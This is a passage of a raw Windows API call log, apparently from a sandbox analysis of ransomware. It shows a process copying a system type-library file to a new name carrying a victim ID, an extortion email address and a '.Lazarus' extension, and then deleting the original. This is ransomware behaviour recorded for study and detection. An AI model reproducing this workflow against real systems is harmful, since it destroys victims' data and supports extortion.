(HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0104.483] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0104.483] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0104.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0104.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0104.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0104.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0104.483] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0104.483] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0104.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0104.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0104.483] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0104.483] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35130 [0104.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0104.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35130 | out: hHeap=0x20000) returned 1 [0104.483] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0104.484] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0104.484] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0104.484] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60088 [0104.484] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0104.484] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0104.484] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8b078 [0104.484] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60088 | out: hHeap=0x20000) returned 1 [0104.484] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.484] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.484] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.484] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.484] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b078 | out: hHeap=0x20000) returned 1 [0104.484] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0104.484] AreFileApisANSI () returned 1 [0104.484] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee100.tlb", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee100.tlb", lpUsedDefaultChar=0x0) returned 66 [0104.484] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d3c8 [0104.484] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.484] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.484] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0104.484] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0104.484] AreFileApisANSI () returned 1 [0104.484] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 66 [0104.484] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x84) returned 0x82568 [0104.484] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x82568, cchWideChar=66 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee100.tlb") returned 66 [0104.484] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee100.tlb" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee100.tlb"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0104.485] GetFileType (hFile=0x368) returned 0x1 [0104.485] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82568 | out: hHeap=0x20000) returned 1 [0104.485] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0104.485] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0104.485] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0104.485] CloseHandle (hObject=0x368) returned 1 [0104.485] AreFileApisANSI () returned 1 [0104.486] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 66 [0104.486] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x84) returned 0x820e8 [0104.486] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x820e8, cchWideChar=66 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee100.tlb") returned 66 [0104.486] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee100.tlb" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee100.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0104.486] GetFileType (hFile=0x368) returned 0x1 [0104.486] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x820e8 | out: hHeap=0x20000) returned 1 [0104.486] CloseHandle (hObject=0x368) returned 1 [0104.486] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0104.486] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0104.486] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0104.486] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0104.486] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0104.486] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0104.486] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0104.486] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0104.486] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0104.486] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0104.486] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0104.486] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0104.486] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0104.486] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0104.486] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0104.486] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0104.487] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0104.487] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0104.487] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0104.487] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0104.487] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0104.487] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0104.487] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0104.487] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0104.487] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0104.487] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0104.487] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0104.487] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0104.487] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0104.487] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0104.487] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0104.487] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0104.487] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0104.487] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0104.487] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0104.487] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0104.487] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0104.487] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0104.487] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0104.487] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0104.487] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0104.487] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0104.487] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0104.487] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0104.487] AreFileApisANSI () returned 1 [0104.487] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 66 [0104.487] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x84) returned 0x82688 [0104.487] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x82688, cchWideChar=66 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee100.tlb") returned 66 [0104.487] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee100.tlb" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee100.tlb"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd6340300, ftCreationTime.dwHighDateTime=0x1d0d6b2, ftLastAccessTime.dwLowDateTime=0x4ae972f5, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0xd6340300, ftLastWriteTime.dwHighDateTime=0x1d0d6b2, nFileSizeHigh=0x0, nFileSizeLow=0x4298)) returned 1 [0104.487] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82688 | out: hHeap=0x20000) returned 1 [0104.488] AreFileApisANSI () returned 1 [0104.488] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0104.488] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0104.488] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0104.488] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0104.488] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0104.488] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0104.488] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0104.488] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0104.488] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0104.488] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d000 [0104.488] GetLastError () returned 0x0 [0104.488] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee100.tlb.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee100.tlb.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0104.488] GetFileType (hFile=0x368) returned 0x1 [0104.488] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30fc0 | out: hHeap=0x20000) returned 1 [0104.488] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0104.489] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0104.489] AreFileApisANSI () returned 1 [0104.489] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 66 [0104.489] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x84) returned 0x82cb8 [0104.489] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x82cb8, cchWideChar=66 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee100.tlb") returned 66 [0104.489] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee100.tlb" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee100.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x35c [0104.489] GetFileType (hFile=0x35c) returned 0x1 [0104.489] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82cb8 | out: hHeap=0x20000) returned 1 [0104.489] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a630 [0104.489] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ff0 [0104.489] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0104.489] GetLastError () returned 0x0 [0104.496] CloseHandle (hObject=0x368) returned 1 [0104.497] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x986d0 | out: hHeap=0x20000) returned 1 [0104.497] CloseHandle (hObject=0x35c) returned 1 [0104.497] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0104.497] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0104.497] AreFileApisANSI () returned 1 [0104.497] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 66 [0104.497] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x84) returned 0x82208 [0104.497] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x82208, cchWideChar=66 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee100.tlb") returned 66 [0104.497] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee100.tlb" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee100.tlb"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x35c [0104.498] GetFileType (hFile=0x35c) returned 0x1 [0104.498] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82208 | out: hHeap=0x20000) returned 1 [0104.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x986d0 [0104.499] GetLastError () returned 0xb7 [0104.499] CloseHandle (hObject=0x35c) returned 1 [0104.500] AreFileApisANSI () returned 1 [0104.500] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 66 [0104.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x84) returned 0x82328 [0104.500] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x82328, cchWideChar=66 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee100.tlb") returned 66 [0104.500] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee100.tlb" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee100.tlb")) returned 1 [0104.501] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82328 | out: hHeap=0x20000) returned 1 [0104.501] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0104.501] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0104.501] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0104.501] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0104.501] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0104.501] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0104.501] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0104.501] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d588 | out: hHeap=0x20000) returned 1 [0104.501] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6c0 | out: hHeap=0x20000) returned 1 [0104.501] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x934a0 | out: hHeap=0x20000) returned 1 [0104.501] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8bf40 | out: hHeap=0x20000) returned 1 [0104.501] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d000 | out: hHeap=0x20000) returned 1 [0104.501] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0104.501] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0104.501] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0104.501] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0104.501] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d3c8 | out: hHeap=0x20000) returned 1 [0104.501] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.501] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.501] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd6340300, ftCreationTime.dwHighDateTime=0x1d0d6b2, ftLastAccessTime.dwLowDateTime=0x4ae972f5, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0xd6340300, ftLastWriteTime.dwHighDateTime=0x1d0d6b2, nFileSizeHigh=0x0, nFileSizeLow=0x5898, dwReserved0=0x1, dwReserved1=0x0, cFileName="vstoee90.tlb", cAlternateFileName="")) returned 1 [0104.501] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0104.501] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0104.501] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0104.501] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0104.501] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0104.501] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0104.501] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0104.501] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0104.501] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0104.502] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0104.502] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0104.502] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0104.502] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0104.502] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0104.502] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0104.502] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0104.502] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0104.502] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0104.502] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0104.502] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fb08 [0104.502] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0104.502] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0104.502] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8aeb0 [0104.502] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fb08 | out: hHeap=0x20000) returned 1 [0104.502] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.502] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.502] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.502] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.502] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0104.502] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0104.502] AreFileApisANSI () returned 1 [0104.502] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee90.tlb", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee90.tlb", lpUsedDefaultChar=0x0) returned 65 [0104.502] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0104.502] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.502] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.502] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0104.502] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0104.502] AreFileApisANSI () returned 1 [0104.502] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 65 [0104.503] RtlAllocateHeap (HeapHandle=0x20000, 